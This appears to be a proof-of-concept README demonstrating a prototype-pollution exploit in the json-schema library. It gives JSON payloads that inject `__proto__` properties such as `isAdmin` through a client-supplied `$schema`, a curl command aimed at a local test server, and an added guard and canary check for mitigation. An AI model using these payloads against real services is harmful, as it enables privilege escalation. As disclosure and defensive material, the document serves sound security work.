Example of exploit of json-schema

The server accepts a POST request on `/` and expects a JSON payload that looks like `{ "payload": "string" }`, which it validates using json-schema.
Special cases:

```json
{
  "$schema": {
    "type": "object",
    "properties": {
      "__proto__": {
        "type": "object",
        "properties": {
          "isAdmin": {
            "type": "boolean",
            "default": true
          }
        }
      }
    },
    "__proto__": {}
  }
}
```

```json
{
  "$schema": {
    "type": "object",
    "properties": {
      "__proto__": {
        "type": "object",
        "properties": {
          "payload": {
            "type": "number",
            "default": 123
          }
        }
      }
    },
    "__proto__": {}
  }
}
```
Sending either of the special cases above as the request body pollutes `Object.prototype`, which results in a different response that indicates the breach.
- Run `npm install`
- Run `node index.js`
- Post any data to `/` to test out the functionality. The exploit case above will showcase the vulnerability, e.g.

```shell
curl http://localhost:3000/ -H "Content-Type: application/json" -X POST -d '{ "$schema": { "type": "object", "properties":{ "__proto__": { "type": "object", "properties": { "isAdmin": { "type": "string", "default": true } } } }, "__proto__": {} } }'
```
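As an added mitigation example that is not part of this PoC repository: a guard that rejects request bodies carrying a client-supplied `$schema` or prototype keys before they reach the validator, plus a canary check that `Object.prototype` is still clean. The function names and the embedded sample body are assumptions made for this example.

```javascript
// Added example (not the PoC's own code): reject request bodies that can
// drive the json-schema prototype-pollution case described above, and
// verify that a fresh object does not inherit auth-relevant attributes.

const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Walk a parsed JSON value and return the first suspicious key path, or null.
function findForbiddenKey(value, path = "$") {
  if (value === null || typeof value !== "object") return null;
  if (Array.isArray(value)) {
    for (let i = 0; i < value.length; i++) {
      const hit = findForbiddenKey(value[i], `${path}[${i}]`);
      if (hit) return hit;
    }
    return null;
  }
  // JSON.parse stores "__proto__" as an own property, so Object.keys sees it.
  for (const key of Object.keys(value)) {
    if (FORBIDDEN_KEYS.has(key)) return `${path}.${key}`;
    // A "$schema" key in user input lets the client supply the schema; reject it.
    if (key === "$schema") return `${path}.${key}`;
    const hit = findForbiddenKey(value[key], `${path}.${key}`);
    if (hit) return hit;
  }
  return null;
}

// Canary: a fresh object must not inherit attributes the app uses for auth.
function prototypeIsClean(canaryKeys = ["isAdmin", "payload"]) {
  const fresh = {};
  return canaryKeys.every((k) => !(k in fresh));
}

// Check the raw body text before it is handed to any validator.
function checkRequestBody(rawBody) {
  let parsed;
  try { parsed = JSON.parse(rawBody); } catch { return { ok: false, reason: "invalid JSON" }; }
  const hit = findForbiddenKey(parsed);
  if (hit) return { ok: false, reason: `forbidden key at ${hit}` };
  if (!Object.prototype.hasOwnProperty.call(parsed, "payload") || typeof parsed.payload !== "string") {
    return { ok: false, reason: "payload must be a string" };
  }
  return { ok: true, value: parsed };
}

// Constructed sample: the first special case from the PoC, as a request body.
const SAMPLE_POLLUTING_BODY =
  '{"$schema":{"type":"object","properties":{"__proto__":{"type":"object",' +
  '"properties":{"isAdmin":{"type":"boolean","default":true}}}},"__proto__":{}}}';
```

Calling `checkRequestBody(SAMPLE_POLLUTING_BODY)` reports `forbidden key at $.$schema`, while `checkRequestBody('{"payload":"hello"}')` passes; run `prototypeIsClean()` after validation to catch a pollution that slipped through anyway.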